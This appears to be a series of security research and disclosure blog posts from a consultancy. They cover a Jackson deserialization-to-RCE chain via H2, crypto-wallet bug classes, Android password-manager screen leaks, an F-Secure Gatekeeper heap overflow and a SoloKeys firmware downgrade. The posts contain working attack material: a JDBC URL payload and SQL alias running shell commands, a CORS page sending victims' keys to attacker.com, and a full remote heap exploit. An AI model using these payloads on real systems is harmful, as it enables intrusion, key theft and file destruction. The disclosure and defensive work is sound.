As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know the requirements for a Jackson “gadget” vulnerability are:

  1. (1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent

  2. (2) The application uses polymorphic type handling for properties with nominal type of java.lang.Object (or one of small number of “permissive” tag interfaces such as java.util.Serializable, java.util.Comparable)

  3. (3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization

  4. (4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.

Preparing for the battlefield

During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

  1. At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
  2. Between lines 5 and 13, it configures Jackson in order to meet requirements (#2)
  3. Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the following libraries and put them in the “classpath” directory:

It should be noted the h2 library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the setUrl(String url) is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non pure” methods that have interesting side effects where we control an argument.

When the getConnection is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Jackson Chain

Enter the Matrix: From SSRF to RCE

As you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC Driver. H2 is a super fast SQL database usually employed as in memory replacement for full-fledged SQL Database Management Systems (such as Postgresql, MSSql, MySql or OracleDB). It is easily configurable and it actually supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However H2, since it was implemented inside the JVM, has the capability to specify custom aliases containing java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple http server such as a python one (e.g. python -m SimpleHttpServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voila’!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other end, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average a run on a Macbook PRO i7 2018 takes 2 minutes.

Jackson Taint Tracking

Taint-tracking is a topical academic research subject. Academic research tools are focused on a very high recall and precision. The trade-off lies between high-recall/precision versus speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool by itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as flowdroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems.

Vulnerability Impact

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.

References:

Checklist:

  • Ensure that your Access-Control-Allow-Origin is never set to null
  • Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
  • Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__ by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks.

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// No assert if password is == mysecret
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, then it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the -Onone flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval.

References:

Checklist:

  • Do not use assert statements for guarding code and enforcing security checks
  • Research for compiler optimizations gotchas in the language you use

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let’s try with -100 coins in a wallet account having 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs unsigned types come to play.

In most architectures, a signed short integer is a 2 bytes type that can hold a negative number and a positive number. In memory, positive numbers are represented as 1 == 0x0001, 2 == 0x0002 and so forth. Instead, negative numbers are represented as two’s complement -1 == 0xffff,-2 == 0xfffe and so forth. These representations meet on 0x7fff, which enables a signed integer to hold a value between -32768 and 32767.

Let’s take a look at an example with pseudo-code:

signed short int bank_account = -30000

Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:

int withdraw(signed short int money){
    bank_account -= money
}

As we know, the max negative value is -32768. What happens if a user withdraws 2768 + 1 ?

withdraw(2769); //32767

Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767.

References:

Checklist:

  • Verify that the transaction systems and other components dealing with financial arithmetic do not accept negative numbers
  • Verify integer boundaries, and whether correct signed vs unsigned types are used across the entire codebase. Note that the signed integer overflow is considered undefined behavior.

4) Password Reset Token Leakage Via Referer

Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.

Vulnerability Impact

A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.

Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320 or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320.

But what actually happens when the user clicks the link?

When a web browser requests a resource, it typically adds an HTTP header, called the Referer header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.

GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close

As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.

References:

Checklist:

  • If possible, applications should never transmit any sensitive information within the URL query string
  • In case of password reset links, the Referer header should always be removed using one of the following techniques:
    • Blank landing page under the web platform domain, followed by a redirect
    • Originate the navigation from a pseudo-URL document, such as data: or javascript:
    • Using <iframe src=about:blank>
    • Using <meta name="referrer" content="no-referrer" />
    • Setting an appropriate Referrer-Policy header, assuming your application supports recent browsers only

If you would like to talk about securing your platform, contact us at [email protected]!

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

The problem

The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.

This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, Youtube Red), developers during the years mistook this “secure” flag as an easy catch-all security feature provided by Android to mark the entire app from being excepted from a screen capture or recording.

Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the FLAG_SECURE set for the activity and won’t pass down the flag to any other Window instances created on behalf of that activity. As a consequence of this, several native UI components like Spinner,Toast,Dialog,PopupWindow and many others will still leak their content to third party applications having the right permissions.

The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around. After a few days of testing, every Android password manager examined (4) was found to be vulnerable to some extent.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

1Password

In 1Password, the Account Settings’ section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the accounts data, protecting them on the server side.

1Password Secret Key Leak Vulnerability

This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.

Keeper

When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.

Keeper Password Leak Vulnerability (without FLAG_SECURE set) Keeper Password Leak Vulnerability (with FLAG_SECURE set)

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.

Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameter for the “safe” passwords is visible by third parties applications on the victim’s device.

Dashlane Password Leak Vulnerability

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.

Dashlane Leak Vulnerability Dashlane Leak Vulnerability

The issue was fixed in Dashlane for Android in version 6.1929.2.

The attack scenario

Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:

  • Malicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;
  • Innocuous-looking apps using Cloak & Dagger attacks;
  • Malicious app installed through third-party Android app stores or bypassing PHA detection filters of the Play Store;
  • Malicious app pushed to the smartphone using the Play Store feature in a Man-in-the-Browser attack scenario;

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.

Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.

As always, this research was possible thanks to my 25% research time at Doyensec!

Internship at Doyensec

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

We offer each candidate a transparent recruitment process in 3 simple steps:

  • 1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months
  • 2) Online challenges to evaluate technical skillset (web security testing)
  • 3) Final call to discuss details
Doyensec internship process

Day 1

Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

Time allocation

While the internship is considered full time over the course of 2/3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

  • Opportunity to perform professional security testing for both start ups and Fortune 500 companies
  • Ability to perform cutting-edge offensive research projects
  • Feedback and guidance
  • Attractive financial compensation

What do we expect from candidates?

Our perfect candidate:

  • Has already some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!

Heap Overflow in F-Secure Internet Gatekeeper

F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

Reproduction environment setup

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: 1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

  1. (1) If you’re using an x64 version of CentOS, execute yum install glibc.i686
  2. (2) Install the Internet Gatekeeper binary using rpm -I <fsigkbin>.rpm
  3. (3) For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use GHIDRA/IDA or your favorite dissassembler/decompiler to start reverse engineering Internet Gatekeeper!

The target

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ lead us down the road of looking for memory corruption vulnerabilities which are usually common in this language.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron which uses Radamsa as the underlying engine. fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as fuzzing seed.

When analyzing the input mutated by radamsa we could quickly see that the root cause of the vulnerability revolved around the Content-length header. The generated test that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect Integer math.

After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. Later, the content length is passed to the function strtoul (String to Unsigned Long)

The following pseudo code provides a summary of the control flow:

content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
   content_len_new = strtoul(content_len_old, 0, 10);
}

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which can have a largest possible value of 2^32-1 (on 32 bit systems).

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul will return the ULONG_MAX value which corresponds to 0xFFFFFFFF on 32 bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content_length variable and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.

Malloc does allow invocations with a 0 bytes argument. When malloc(0) is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can be also read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage Malloc’s chunks of size 0x10 with an overflow of arbitrary data to override existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then subsequently spraying the heap with the full path of the file we want to delete. Internet Gatekeeper internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal which is sufficient to demonstrate the severity of the issue.

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to [email protected] ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

Resources for learning about heap exploitation

Exploit walkthroughs

GLibC walkthroughs

Tools

  • GEF - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging
  • Villoc - Visual representation of the heap in HTML

Security Analysis of the Solo Firmware

This blogpost summarizes the result of a cooperation between SoloKeys and Doyensec, and was originally published on SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

SoloKeys firmware snippet

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person/days project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and fixed in v3.1.0. The full report is available with all details, while in this post we’d like to give a high level summary of the engagement and findings.

Why a Security Analysis, Why Now?

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The Major Finding: Downgrade Attack

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or -if attempted on a malicious site- an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.

Anatomy of the Downgrade Attack

This was the incriminated code. And this is the patch, that should help understand what happened.

Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant as this attack only allows to install older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, think of running v3.0.1, and take an old firmware - say v3.0.0. Search four bytes in it which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Firmware downgrade step 1 Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.

Firmware downgrade step 1

Fuzzing TinyCBOR with AFL

